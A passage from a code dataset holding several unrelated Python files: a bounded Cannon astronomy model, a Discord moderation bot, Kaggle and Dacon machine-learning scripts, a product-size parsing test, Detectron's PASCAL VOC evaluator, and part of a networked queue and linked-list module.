else:\n            raise TypeError(\"theta_bounds must be a dictionary-like object\")\n\n\n\n    def train(self, threads=None, op_kwds=None):\n        \"\"\"\n        Train the model.\n\n        :param threads: [optional]\n            The number of parallel threads to use.\n\n        :param op_kwds:\n            Keyword arguments to provide directly to the optimization function.\n\n        :returns:\n            A three-length tuple containing the spectral coefficients `theta`,\n            the squared scatter term at each pixel `s2`, and metadata related to\n            the training of each pixel.\n        \"\"\"\n\n        # Generate the optimization bounds based on self.theta_bounds.\n        op_bounds = [self.theta_bounds.get(term, (None, None)) \\\n            for term in self.vectorizer.human_readable_label_vector.split(\" + \")]\n\n        kwds = dict(op_method=\"l_bfgs_b\", op_strict=False, op_kwds=(op_kwds or {}))\n        kwds[\"op_kwds\"].update(bounds=op_bounds)\n        \n        return super(RestrictedCannonModel, self).train(threads=threads, **kwds)\n
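\n\n# Editor's addition -- a hypothetical usage sketch, not from the package docs:\n# constructing a bounded model, assuming the training set, inverse variances\n# and vectorizer are already in hand; the label name mirrors the docstring\n# example above.\n#\n#     model = RestrictedCannonModel(training_set_labels, training_set_flux,\n#                                   training_set_ivar, vectorizer,\n#                                   theta_bounds={\"FE_H\": (None, 0)})\n#     model.train()\n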
","repo_name":"andycasey/AnniesLasso","sub_path":"thecannon/restricted.py","file_name":"restricted.py","file_ext":"py","file_size_in_byte":5616,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"30993435146","text":"import discord\nfrom discord.ext import commands\nimport random\nfrom discord import Member\nfrom discord.ext.commands import has_permissions, MissingPermissions\n\nclient = commands.Bot(command_prefix='PUTYOURPREFIXHERE')\n\n@client.event\nasync def on_ready():\n    await client.change_presence(activity=discord.Game('SETSTATUSHERE'))\n\n    print('Connected to bot: {}'.format(client.user.name))\n    print('Bot ID: {}'.format(client.user.id))\n\n\n@client.command()\nasync def ping(ctx):\n    await ctx.send('Pong! {0}ms'.format(round(client.latency * 1000)))\n\n\n@client.command()\n@commands.has_permissions(kick_members=True)\nasync def kick(ctx, member: discord.Member, *, reason=None):\n    await member.kick(reason=reason)\n    await ctx.send(f' user {member} has been kicked.')\n\n@client.command()\n@commands.has_permissions(mute_members=True)\nasync def mute(ctx, member: discord.Member, *, reason=None):\n    # server (voice) mute; the member must be connected to a voice channel\n    await member.edit(mute=True, reason=reason)\n    await ctx.send(f' user {member} has been muted.')\n    \n@client.command()\nasync def server(ctx):\n    name = str(ctx.guild.name)\n    description = str(ctx.guild.description)\n\n    owner = str(ctx.guild.owner)\n    id = str(ctx.guild.id)\n    region = str(ctx.guild.region)\n    memberCount = str(ctx.guild.member_count)\n\n    icon = str(ctx.guild.icon_url)\n\n    embed = discord.Embed(\n        title=name + \" Server Information\",\n        description=description,\n        color=discord.Color.blue()\n    )\n    embed.set_thumbnail(url=icon)\n    embed.add_field(name=\"Owner\", value=owner, inline=True)\n    embed.add_field(name=\"Server ID\", value=id, inline=True)\n    embed.add_field(name=\"Region\", value=region, inline=True)\n    embed.add_field(name=\"Member Count\", value=memberCount, inline=True)\n\n    await ctx.send(embed=embed)\n    \n    \n@client.command()\n@commands.has_permissions(ban_members=True)\nasync def unban(ctx, *, member):\n    bannedUsers = await ctx.guild.bans()\n    name, discriminator = member.split(\"#\")\n\n    for ban in bannedUsers:\n        user = ban.user\n\n        if(user.name, user.discriminator) == (name, discriminator):\n            await ctx.guild.unban(user)\n            await ctx.send(f\"{user.mention} was unbanned.\")\n            return\n\n\n@client.command()\n@commands.has_permissions(ban_members=True)\nasync def ban(ctx, member: discord.Member, *, reason=None):\n    await member.ban(reason=reason)\n    await ctx.send(f' user {member} has been banned.')\n\n\nclient.run('PUTTOKENHERE')\n","repo_name":"kenjipy/discord.Py-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71427175720","text":"import numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\nimport os\n\nimport matplotlib\n\nimport matplotlib.pyplot as plt\n\nfrom pandas.plotting import register_matplotlib_converters\n\nregister_matplotlib_converters()\n\n\n\nsub = None\n\nfor dirname, _, filenames in os.walk('/kaggle/input/subs20191106/'):\n\n for filename in filenames:\n\n filename = os.path.join(dirname, filename)\n\n print(filename)\n\n if sub is None:\n\n sub = pd.read_csv(filename)\n\n else:\n\n sub.meter_reading += pd.read_csv(filename, usecols=['meter_reading']).meter_reading\n\n sub.meter_reading = sub.meter_reading.clip(lower=0) / len(filenames)\n\n\n\nsub.describe()\n# prediction's log-log histogram:\n\nax = np.log1p(sub.meter_reading).hist(bins=100)\n\nax.set_yscale('log')\npath = '../input/clean-weather-data-eda'\n\nbuilding = pd.read_csv(f'{path}/building_metadata.csv.gz', dtype={'building_id':np.uint16, 'site_id':np.uint8})\ntrain = pd.read_csv(f'{path}/train.csv.gz', dtype={'building_id':np.uint16, 'meter':np.uint8}, parse_dates=['timestamp'])\n\ntrain = train.merge(building, on='building_id', how='left')\n\ntrain.head()\n# target's log-log histogram:\n\nax = np.log1p(train.meter_reading).hist(bins=100)\n\nax.set_yscale('log')\ntest = pd.read_csv(f'{path}/test.csv.gz', dtype={'building_id':np.uint16, 'meter':np.uint8}, parse_dates=['timestamp'])\n\ntest['meter_reading'] = sub.meter_reading\n\ntest = test.merge(building, on='building_id', how='left')\n\ntest.head()\nweather_trn = pd.read_csv(f'{path}/weather_train.csv.gz', parse_dates=['timestamp'],\n\n dtype={'site_id':np.uint8, 'air_temperature':np.float16},\n\n usecols=['site_id', 'timestamp', 'air_temperature'])\n\nweather_tst = pd.read_csv(f'{path}/weather_test.csv.gz', parse_dates=['timestamp'],\n\n dtype={'site_id':np.uint8, 'air_temperature':np.float16},\n\n usecols=['site_id', 'timestamp', 'air_temperature'])\n\ntrain = train.merge(weather_trn, on=['site_id', 'timestamp'], how='left')\n\ntest = test.merge(weather_tst, on=['site_id', 'timestamp'], how='left')\nbuilding_id = 1258\n\nmeter = 1 # pick a meter\n\n\n\ntrain_sample = train[(train['building_id'] == building_id) & (train['meter'] == meter)] # same train sample as above\n\ntest_sample = test[(test['building_id'] == building_id) & (test['meter'] == meter)] # and the same meter in the test set\n\n\n\nfig, ax = plt.subplots(figsize=(16,4))\n\nplt.title(f'Building {building_id} Meter {meter}')\n\nax.xaxis.set_tick_params(rotation=30, labelsize=10)\n\nax2 = ax.twinx()\n\n\n\n# plot training sample\n\ndates = matplotlib.dates.date2num(train_sample['timestamp'])\n\nax2.plot_date(dates, train_sample['meter_reading'], '-', label='train', alpha=0.8)\n\nax.plot_date(dates, train_sample['air_temperature'], '.', color='tab:cyan', label='air_temperature')\n\n\n\n# plot test sample\n\ndates = matplotlib.dates.date2num(test_sample['timestamp'])\n\nax2.plot_date(dates, test_sample['meter_reading'], '*', label='test', alpha=0.8)\n\nax.plot_date(dates, test_sample['air_temperature'], '.', color='tab:cyan', label='air_temperature')\n\n\n\nax.set_ylabel('air_temperature'); ax2.set_ylabel('meter_reading')\n\nax.legend(loc='upper left'); ax2.legend(loc='upper right')\nsub.to_csv(f'submission.csv', index=False, float_format='%g')","repo_name":"aorursy/new-nb-3","sub_path":"hmendonca_4-ashrae-blended.py","file_name":"hmendonca_4-ashrae-blended.py","file_ext":"py","file_size_in_byte":3470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5866545953","text":"from tensorflow.python.keras.models 
import Sequential, Model\nfrom tensorflow.python.keras.layers import Dense, Input, Dropout, Flatten,Conv2D,LSTM\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler, MaxAbsScaler, RobustScaler, LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.python.keras.callbacks import EarlyStopping\nfrom sklearn.model_selection import GridSearchCV,RandomizedSearchCV\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import r2_score\nimport numpy as np\nimport pandas as pd\n\n# 1. Data\n# 1.1 Paths and loading\npath='c:/study/_data/dacon_cal/'\nsave_path= 'c:/study/_save/dacon_cal/'\nsubmission = pd.read_csv(path+'sample_submission.csv')\n\ntrain_csv = pd.read_csv(path +'train.csv', index_col=0)\ntest_csv = pd.read_csv(path +'test.csv', index_col=0)\n\n# 1.2 Sanity checks\nprint(train_csv.shape, test_csv.shape)\n# (7500, 10) (7500, 9)\n\n# 1.3 Missing values\n# print(train_csv.isnull().sum())\n# print(train_csv.info())\n\n# 1.4 Label encoding (for object columns)\nle=LabelEncoder()\nfor i in train_csv.columns:\n    if train_csv[i].dtype=='object':\n        train_csv[i] = le.fit_transform(train_csv[i])\n        test_csv[i] = le.fit_transform(test_csv[i])\n# print(len(train_csv.columns))\n# print('==============')\n# print(train_csv.info())\n# print('===================')\ntrain_csv=train_csv.dropna()\nprint(train_csv.shape)\n\n\n# 1.5 Split x and y\nx = train_csv.drop(['Calories_Burned'], axis=1)\ny = train_csv['Calories_Burned']\n\nprint(x.shape,y.shape) #(7500, 9) (7500,)\n\n# 1.6 Train/test split\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=35468264, shuffle=True)\n\nprint(x_train.shape) #(6000, 9)\nprint(x_test.shape) #(1500, 9)\nprint(test_csv.shape) #(7500, 9)\n\n# 1.7 Scaler\nscaler = MinMaxScaler() # returns arrays here, so no conversion is needed for the reshape below\nx_train = scaler.fit_transform(x_train)\nx_test = scaler.transform(x_test)\ntest_csv = scaler.transform(test_csv)\n\nprint(x_train)\n\n# 2. Build the model\n# model = Sequential()\n# model.add(Dense(32, input_dim=8))\n# model.add(Dense(64))\n# model.add(Dense(64))\n# model.add(Dense(32))\n# model.add(Dense(8))\n# model.add(Dense(1))\n\nx_train= x_train.reshape(6000,9,1)\nx_test= x_test.reshape(1500,9,1)\ntest_csv = test_csv.reshape(7500,9,1) # the test file also goes through the model, so it must be reshaped too.\n\n\nmodel = Sequential()\nmodel.add(LSTM(96,input_shape=(9,1),activation='linear',return_sequences=True))\nmodel.add(LSTM(86,input_shape=(9,1),activation='relu'))\nmodel.add(Dense(76,activation='selu'))\nmodel.add(Dense(66))\nmodel.add(Dense(56))\nmodel.add(Dropout(0.1))\nmodel.add(Dense(46))\nmodel.add(Dense(32,activation='relu'))\nmodel.add(Dense(1))\n\n# model = Sequential()\n# model.add(Conv2D(7,(2,1),input_shape=(8,1,1)))\n# model.add(Conv2D(8,(2,1),activation='relu'))\n# model.add(Flatten())\n# model.add(Dense(9,activation='relu'))\n# model.add(Dense(6))\n# model.add(Dense(1))\n\n# input1 = Input(shape=(78,))\n# dense1 = Dense(32)(input1)\n# drop1 = Dropout(0.2)(dense1)\n# dense2 = Dense(64, activation='relu')(drop1)\n# dense3 = Dense(64)(dense2)\n# dense4 = Dense(32,activation='relu')(dense3)\n# dense5 = Dense(35)(dense4)\n# drop2 = Dropout(0.2)(dense5)\n# output1 = Dense(1)(drop2)\n# model = Model(inputs=input1, outputs=output1)\n
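\n# Editor's addition -- a hypothetical aside, not part of the original script:\n# Keras LSTM layers expect 3-D input of shape (samples, timesteps, features),\n# which is why the (N, 9) arrays were reshaped to (N, 9, 1) above -- each of\n# the 9 tabular columns is treated as one timestep with a single feature:\n#\n#     a = np.zeros((6000, 9))\n#     assert a.reshape(6000, 9, 1).shape == (6000, 9, 1)\n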
\n# 3. Compile and train\nmodel.compile(loss='mse', optimizer='adam')\nes = EarlyStopping(monitor='val_loss', patience=300, verbose=1, mode='min', restore_best_weights=True)\nhist = model.fit(x_train, y_train, epochs=1000, batch_size=128, verbose=1, validation_split=0.1, callbacks=[es])\n\nmodel.save('./_save/kcal/kcal_save_model01.h5')\n\n# 4. Evaluate, predict\nloss = model.evaluate(x_test, y_test)\nprint('loss : ', loss)\n\ny_predict = model.predict(x_test)\n\nr2 = r2_score(y_test, y_predict)\nprint('r2 : ', r2)\n\n# Define an RMSE helper\ndef RMSE(y_test,y_pre):\n    return np.sqrt(mean_squared_error(y_test,y_pre)) # definition\nrmse=RMSE(y_test,y_predict) # use\nprint('RMSE :',rmse)\n\n# 4.1 Export\nimport datetime\n\n# Save submission file with timestamp\ndate = datetime.datetime.now()\ndate = date.strftime(\"%m%d_%H%M\")\nsubmission.to_csv(save_path + date + 'submission.csv', index=False)\n","repo_name":"mkim9002/AIA","sub_path":"keras/practice_dacon-cal11y.py","file_name":"practice_dacon-cal11y.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"35892022151","text":"import services\nfrom services.sizing.size_pattern_matcher import size_finder\n\n\ndef test_sizing():\n    test_cases = (\n        (\" Gillette Tıraş Bıçağı Yedek Mach 3 2'li fs335 \", (2, \"adet\")),\n        (\" 2'li \", (2, \"adet\")),\n        (\"dasd 10'lu \", (10, \"adet\")),\n        (\"Pınar %60 Light Süt 1 L gfds\", (1000, \"ml\")),\n        (\"Ph 3.8 200 Ml fasf\", (200, \"ml\")),\n        (\"da 200 ml dasd\", (200, \"ml\")),\n        (\"dasd 4 kg \", (4000, \"gr\")),\n        (\"da 200 ml dasd\", (200, \"ml\")),\n        (\"f54 8 yıkama \", (8, \"yıkama\")),\n        (\"F20 200 ML dwa\", (200, \"ml\")),\n        (\"2x200 ML afdas\", (400, \"ml\")),\n        (\"dasd 4 x 200 ML 565dfds\", (800, \"ml\")),\n        (\"2/1 360 ML ada\", (360, \"ml\")),\n        (\" 0.75 L adfa\", (750, \"ml\")),\n        (\"dasd 3 6.5 kg\", (6500, \"gr\")),\n        (\"5 800 g\", (800, \"gr\")),\n        (\"Persil Gülün Büyüsü 6 KG 40 Yıkama\", (40, \"yıkama\")),\n        (\"aptamil 2 800 g\", (800, \"gr\")),\n        (\"a Gazlı İçecek Portakal 1.75 L\", (1750, \"ml\")),\n        (\"780GR 4 LÜ\", (780, \"gr\")),\n        (\"dasd 4 LU 780 GR asasd\", (780, \"gr\")),\n        (\"süt 1/1 litre sadsad\", (1000, \"ml\")),\n        (\"coca cola 1 lt.light\", (1000, \"ml\")),\n        (\"ULKER 117 175GR PETIBOR \", (175, \"gr\")),\n        (\"5 800 gr. asdas\", (800, \"gr\")),\n        (\" 0.75 L. adfa\", (750, \"ml\")),\n        (\" 750 ml. 
adfa\", (750, \"ml\")),\n (\"30+ 50 ML\", (50, \"ml\")),\n )\n\n for case, answer in test_cases:\n clean_name = services.clean_string(case)\n result = size_finder.get_first_digits_unit(clean_name)\n try:\n assert answer == result\n except (AssertionError, AttributeError, IndexError, TypeError) as e:\n print(\"FAIL\", case)\n print(clean_name)\n print(\"expected\", answer)\n print(\"got\", result)\n print(e)\n\n\nif __name__ == \"__main__\":\n ...\n","repo_name":"selimslab/entrophy","sub_path":"services/sizing/test_sizing.py","file_name":"test_sizing.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29547027595","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport numpy as np\nimport os\nimport shutil\nimport uuid\n\nfrom detectron.core.config import cfg\nfrom detectron.datasets.dataset_catalog import get_devkit_dir\nfrom detectron.datasets.voc_eval import voc_eval\nfrom detectron.utils.io import save_object\n\nlogger = logging.getLogger(__name__)\n\n\ndef evaluate_boxes(\n json_dataset,\n all_boxes,\n output_dir,\n use_salt=True,\n cleanup=True,\n use_matlab=False\n):\n salt = '_{}'.format(str(uuid.uuid4())) if use_salt else ''\n filenames = _write_voc_results_files(json_dataset, all_boxes, salt)\n _do_python_eval(json_dataset, salt, output_dir)\n if use_matlab:\n _do_matlab_eval(json_dataset, salt, output_dir)\n if cleanup:\n for filename in filenames:\n shutil.copy(filename, output_dir)\n os.remove(filename)\n return None\n\n\ndef _write_voc_results_files(json_dataset, all_boxes, salt):\n filenames = []\n image_set_path = voc_info(json_dataset)['image_set_path']\n assert os.path.exists(image_set_path), \\\n 'Image set path does not exist: {}'.format(image_set_path)\n with open(image_set_path, 'r') as f:\n image_index = [x.strip() for x in f.readlines()]\n # Sanity check that order of images in json dataset matches order in the\n # image set\n roidb = json_dataset.get_roidb()\n for i, entry in enumerate(roidb):\n index = os.path.splitext(os.path.split(entry['image'])[1])[0]\n assert index == image_index[i]\n for cls_ind, cls in enumerate(json_dataset.classes):\n if cls == '__background__':\n continue\n logger.info('Writing VOC results for: {}'.format(cls))\n filename = _get_voc_results_file_template(json_dataset,\n salt).format(cls)\n filenames.append(filename)\n assert len(all_boxes[cls_ind]) == len(image_index)\n with open(filename, 'wt') as f:\n for im_ind, index in enumerate(image_index):\n dets = all_boxes[cls_ind][im_ind]\n if type(dets) == list:\n assert len(dets) == 0, \\\n 'dets should be numpy.ndarray or empty list'\n continue\n # the VOCdevkit expects 1-based indices\n for k in range(dets.shape[0]):\n f.write('{:s} {:.3f} {:.1f} {:.1f} {:.1f} {:.1f}\\n'.\n format(index, dets[k, -1],\n dets[k, 0] + 1, dets[k, 1] + 1,\n dets[k, 2] + 1, dets[k, 3] + 1))\n return filenames\n\n\ndef _get_voc_results_file_template(json_dataset, salt):\n info = voc_info(json_dataset)\n year = info['year']\n image_set = info['image_set']\n devkit_path = info['devkit_path']\n # VOCdevkit/results/VOC2007/Main/_det_test_aeroplane.txt\n filename = 'comp4' + salt + '_det_' + image_set + '_{:s}.txt'\n return os.path.join(devkit_path, 'results', 'VOC' + year, 'Main', filename)\n\n\ndef _do_python_eval(json_dataset, salt, output_dir='output'):\n info = 
voc_info(json_dataset)\n year = info['year']\n anno_path = info['anno_path']\n image_set_path = info['image_set_path']\n devkit_path = info['devkit_path']\n cachedir = os.path.join(devkit_path, 'annotations_cache')\n aps = []\n # The PASCAL VOC metric changed in 2010\n use_07_metric = True if int(year) < 2010 else False\n logger.info('VOC07 metric? ' + ('Yes' if use_07_metric else 'No'))\n if not os.path.isdir(output_dir):\n os.mkdir(output_dir)\n for _, cls in enumerate(json_dataset.classes):\n if cls == '__background__':\n continue\n filename = _get_voc_results_file_template(\n json_dataset, salt).format(cls)\n rec, prec, ap = voc_eval(\n filename, anno_path, image_set_path, cls, cachedir, ovthresh=0.5,\n use_07_metric=use_07_metric)\n aps += [ap]\n logger.info('AP for {} = {:.4f}'.format(cls, ap))\n res_file = os.path.join(output_dir, cls + '_pr.pkl')\n save_object({'rec': rec, 'prec': prec, 'ap': ap}, res_file)\n logger.info('Mean AP = {:.4f}'.format(np.mean(aps)))\n logger.info('~~~~~~~~')\n logger.info('Results:')\n for ap in aps:\n logger.info('{:.3f}'.format(ap))\n logger.info('{:.3f}'.format(np.mean(aps)))\n logger.info('~~~~~~~~')\n logger.info('')\n logger.info('----------------------------------------------------------')\n logger.info('Results computed with the **unofficial** Python eval code.')\n logger.info('Results should be very close to the official MATLAB code.')\n logger.info('Use `./tools/reval.py --matlab ...` for your paper.')\n logger.info('-- Thanks, The Management')\n logger.info('----------------------------------------------------------')\n\n\ndef _do_matlab_eval(json_dataset, salt, output_dir='output'):\n import subprocess\n logger.info('-----------------------------------------------------')\n logger.info('Computing results with the official MATLAB eval code.')\n logger.info('-----------------------------------------------------')\n info = voc_info(json_dataset)\n path = os.path.join(\n cfg.ROOT_DIR, 'detectron', 'datasets', 'VOCdevkit-matlab-wrapper')\n cmd = 'cd {} && '.format(path)\n cmd += '{:s} -nodisplay -nodesktop '.format(cfg.MATLAB)\n cmd += '-r \"dbstop if error; '\n cmd += 'voc_eval(\\'{:s}\\',\\'{:s}\\',\\'{:s}\\',\\'{:s}\\'); quit;\"' \\\n .format(info['devkit_path'], 'comp4' + salt, info['image_set'],\n output_dir)\n logger.info('Running:\\n{}'.format(cmd))\n subprocess.call(cmd, shell=True)\n\n\ndef voc_info(json_dataset):\n year = json_dataset.name[4:8]\n image_set = json_dataset.name[9:]\n devkit_path = get_devkit_dir(json_dataset.name)\n assert os.path.exists(devkit_path), \\\n 'Devkit directory {} not found'.format(devkit_path)\n anno_path = os.path.join(\n devkit_path, 'VOC' + year, 'Annotations', '{:s}.xml')\n image_set_path = os.path.join(\n devkit_path, 'VOC' + year, 'ImageSets', 'Main', image_set + '.txt')\n return dict(\n year=year,\n image_set=image_set,\n devkit_path=devkit_path,\n anno_path=anno_path,\n image_set_path=image_set_path)\n","repo_name":"facebookresearch/Detectron","sub_path":"detectron/datasets/voc_dataset_evaluator.py","file_name":"voc_dataset_evaluator.py","file_ext":"py","file_size_in_byte":6395,"program_lang":"python","lang":"en","doc_type":"code","stars":26012,"dataset":"github-code","pt":"18"} +{"seq_id":"8383092065","text":"from binascii import hexlify, rledecode_hqx, rlecode_hqx, unhexlify\nfrom copy import copy\nfrom enum import Enum\nfrom getopt import getopt\nfrom os import kill\nfrom socket import socket, AF_INET, SOCK_STREAM\nfrom socketserver import TCPServer, ThreadingMixIn, StreamRequestHandler\nfrom 
sqlite3 import connect, OperationalError, Row\nfrom ssl import wrap_socket, CERT_NONE, CERT_REQUIRED, PROTOCOL_TLSv1\nfrom struct import pack, unpack\nfrom sys import argv, exit\nfrom threading import Condition, Lock, RLock, Thread\nfrom time import sleep\nfrom traceback import format_exc, print_stack\nfrom uuid import uuid4\n\nfrom subprocess import Popen, STDOUT\ntry:\n from subprocess import CREATE_NEW_PROCESS_GROUP\n\n # DETACHED_PROCESS is a creation flag for Popen that can be imported from\n # the win32process module if pywin32 is installed, or manually defined\n DETACHED_PROCESS = 0x00000008\n\n WIN32_POPEN_FLAGS = DETACHED_PROCESS | CREATE_NEW_PROCESS_GROUP\nexcept:\n # running on non-Windows platform\n WIN32_POPEN_FLAGS = None\n\nDEFAULT_TCP_PORT = 9990\nDEFAULT_SSL_PORT = 9991\n\nDEFAULT_SSL_PEM_FILE = 'server.pem'\nDEFAULT_SSL_KEY_FILE = 'server.key'\n\n# sets buffer size for network reads\nMAX_BUF_LEN = 4096\n\n# superq network node supported commands\nSQNodeCmd = Enum('SQNodeCmd', 'superq_exists '\n 'superq_create '\n 'superq_read '\n 'superq_delete '\n 'superq_query '\n 'superqelem_exists '\n 'superqelem_create '\n 'superqelem_read '\n 'superqelem_update '\n 'superqelem_delete')\n\n# local process datastore serving either user program or network node\n_dataStore = None\n_dataStoreLock = Lock()\n\ndef shutdown():\n if _dataStore:\n _dataStore.shutdown()\n\ndef log(msg):\n with open('node.output', 'a') as f:\n f.write('\\n' + msg)\n\n# base superq exception\nclass SuperQEx(Exception):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass NotImplemented(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n \nclass DBExecError(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass MalformedNetworkRequest(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass MalformedNetworkResponse(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass SuperQEmpty(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass SuperQFull(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\nclass ObjectNotRecognized(SuperQEx):\n def __init__(self, value):\n self.value = value\n def __str__(self):\n return repr(self.value)\n\n# simple linked list element. 
superqelem inherits from this\nclass LinkedListNode():\n    def __init__(self):\n        self.prev = None\n        self.next = None\n\n# doubly-linked list implementation used by superq and superqelem\nclass LinkedList():\n    def __init__(self, circular = False):\n        self.head = None\n        self.tail = None\n        self.__count = 0\n\n        # llist can iterate circularly\n        self.circular = circular\n\n    def __len__(self):\n        return self.__count\n\n    def __iter__(self):\n        self.__next = self.head\n        return self\n\n    def __next__(self):\n        returnObj = self.__next\n\n        if returnObj is None:\n            if self.circular:\n                self.__next = self.head\n                returnObj = self.__next\n            else:\n                raise StopIteration\n\n        self.__next = returnObj.next\n\n        return returnObj\n\n    def __lookup(self, idx):\n        # convert negative index to positive\n        if idx < 0:\n            idx += self.__count\n\n        if idx < 0 or idx >= self.__count:\n            raise IndexError('idx ({0}/{1}) out of range'.format(idx,\n                                                                 len(self)))\n\n        if self.__count == 0:\n            return None\n\n        # start from whichever end of list is closest to idx\n        midIdx = (self.__count - 1) // 2\n        if idx < midIdx:\n            item = self.head\n            for i in range(0, idx):\n                item = item.next\n        else:\n            item = self.tail\n            for i in range(0, (self.__count - 1) - idx):\n                item = item.prev\n\n        return item\n\n    def __slice(self, slice_):\n        newLst = LinkedList()\n\n        start = slice_.start\n        stop = slice_.stop\n        step = slice_.step\n\n        if step == None:\n            step = 1\n\n        if start == None:\n            if step < 0:\n                start = -1\n            else:\n                start = 0\n        elif start < 0:\n            start = len(self) + start\n\n        if abs(start) > len(self):\n            raise IndexError('list index out of range')\n\n        if stop == None:\n            stop = len(self)\n        elif stop < 0:\n            stop = len(self) + stop\n\n        if abs(stop) > len(self):\n            raise IndexError('list index out of range')\n\n        node = self.__getitem__(start)\n        for i in range(*slice_.indices(len(self))):\n            newLst.push_tail(copy(node))\n            steps = step\n            while steps != 0:\n                if steps < 0:\n                    node = node.prev\n                    if node is None:\n                        node = self.tail\n                    steps += 1\n                else:\n                    node = node.next\n                    if node is None:\n                        node = self.head\n                    steps -= 1\n\n        return newLst\n\n    def __getitem__(self, val):\n        if isinstance(val, slice):\n            return self.__slice(val)\n\n        return self.__lookup(val)\n\n    def is_empty(self):\n        return self.__count == 0\n\n    def push(self, idx, node):\n        if idx == 0:\n            # set new head, order of operations matters\n            node.prev = None\n            node.next = self.head\n\n            # if list not empty, point current head to new head\n            if self.head is not None:\n                self.head.prev = node\n            else:\n                self.tail = node\n\n            self.head = node\n        elif idx >= self.__count:\n            # set new tail, order of operations matters\n            node.next = None\n            node.prev = self.tail\n\n            # if list not empty, point current tail to new tail\n            if self.tail is not None:\n                self.tail.next = node\n            else:\n                self.head = node\n\n            self.tail = node\n        else:\n            curNode = self.__lookup(idx)\n\n            # handle empty list case\n            if curNode is None:\n                self.head = node\n                self.tail = node\n                node.prev = None\n                node.next = None\n            else:\n                # splice new node in\n                node.next = curNode\n                node.prev = curNode.prev\n                curNode.prev.next = node\n                curNode.prev = node\n\n        self.__count += 1\n\n    def push_head(self, node):\n        self.push(0, node)\n\n    def push_middle(self, idx, node):\n        self.push(idx, node)\n\n    def push_tail(self, node):\n        self.push(self.__count, node)\n
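\n    # Editor's addition -- a hypothetical usage sketch (comments only), not\n    # part of the original module: once constructed, the list doubles as a\n    # deque:\n    #\n    #     ll = LinkedList()\n    #     ll.push_tail(LinkedListNode())   # enqueue at the tail\n    #     node = ll.pop_head()             # dequeue from the head\n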
\n    def pop(self, idx):\n        if self.__count < 1:\n            return None\n        \n        if idx <= 0:\n            # get list head\n            item = self.head\n\n            # point list head to next element\n            self.head = self.head.next\n\n            # if list not empty, tell head it has no prev \n            if self.head is not None:\n                self.head.prev = None\n\n            # one less element in the list\n            self.__count -= 1\n\n            # if down to 1 element, set tail to head\n            if self.__count == 1:\n                self.tail = self.head\n            \n            return item\n        elif idx >= self.__count - 1:\n            # get list tail\n            item = self.tail\n\n            # point list tail to previous element\n            self.tail = self.tail.prev\n\n            # if list not empty, tell tail it has no next\n            if self.tail is not None:\n                self.tail.next = None\n\n            # one less element in the list\n            self.__count -= 1\n\n            # if down to 1 element, set head to tail\n            if self.__count == 1:\n                self.head = self.tail\n\n            return item\n        else:\n            curNode = self.__lookup(idx)\n\n            # because curNode is not head or tail, these dereferences are safe\n            curNode.prev.next = curNode.next\n            curNode.next.prev = curNode.prev\n\n            # one less element in the list\n            self.__count -= 1\n\n            return curNode\n    \n    def pop_head(self):\n        return self.pop(0)\n\n    def pop_middle(self, idx):\n        return self.pop(idx)\n\n    def pop_tail(self):\n        return self.pop(self.__count - 1)\n\n    def pop_node(self, node):\n        if node is None:\n            return None\n\n        if node.prev is not None:\n            node.prev.next = node.next\n        else:\n            self.head = node.next\n\n        if node.next is not None:\n            node.next.prev = node.prev\n        else:\n            self.tail = node.prev\n\n        self.__count -= 1\n\n        return node\n\n    def insert_before(self, oldNode, newNode):\n        if self.__count < 1:\n            raise SuperQEx('Calling insert_before() on empty list.')\n\n        # handle case inserting new head\n        if self.head == oldNode:\n            newNode.prev = None\n            newNode.next = oldNode\n            oldNode.prev = newNode\n            self.head = newNode\n        else:\n            newNode.prev = oldNode.prev\n            newNode.next = oldNode\n            oldNode.prev.next = newNode\n            oldNode.prev = newNode\n\n        self.__count += 1\n\n    def insert_after(self, oldNode, newNode):\n        if self.__count < 1:\n            raise SuperQEx('Calling insert_after() on empty list.')\n\n        # handle case inserting new tail\n        if self.tail == oldNode:\n            newNode.next = None\n            newNode.prev = oldNode\n            oldNode.next = newNode\n            self.tail = newNode\n        else:\n            newNode.prev = oldNode\n            newNode.next = oldNode.next\n            oldNode.next.prev = newNode\n            oldNode.next = newNode\n\n        self.__count += 1\n\n    def move_up(self, node):\n        # can't move list node up if it is already head\n        if node.prev is None:\n            return\n\n        # these are aliases to the 4 starting elements involved\n        above_node_prev = node.prev.prev\n        above_node = node.prev\n        current_node = node\n        current_node_next = node.next\n\n        # do the pointer swaps\n        if above_node_prev is not None:\n            above_node_prev.next = current_node\n        current_node.prev = above_node_prev\n        current_node.next = above_node\n        above_node.prev = current_node\n        above_node.next = current_node_next\n        if current_node_next is not None:\n            current_node_next.prev = above_node\n\n        # if node is at top of list, set head to node\n        if current_node.prev is None:\n            self.head = current_node\n\n        # if the displaced node is now last, set tail to it\n        if above_node.next is None:\n            self.tail = above_node\n\n    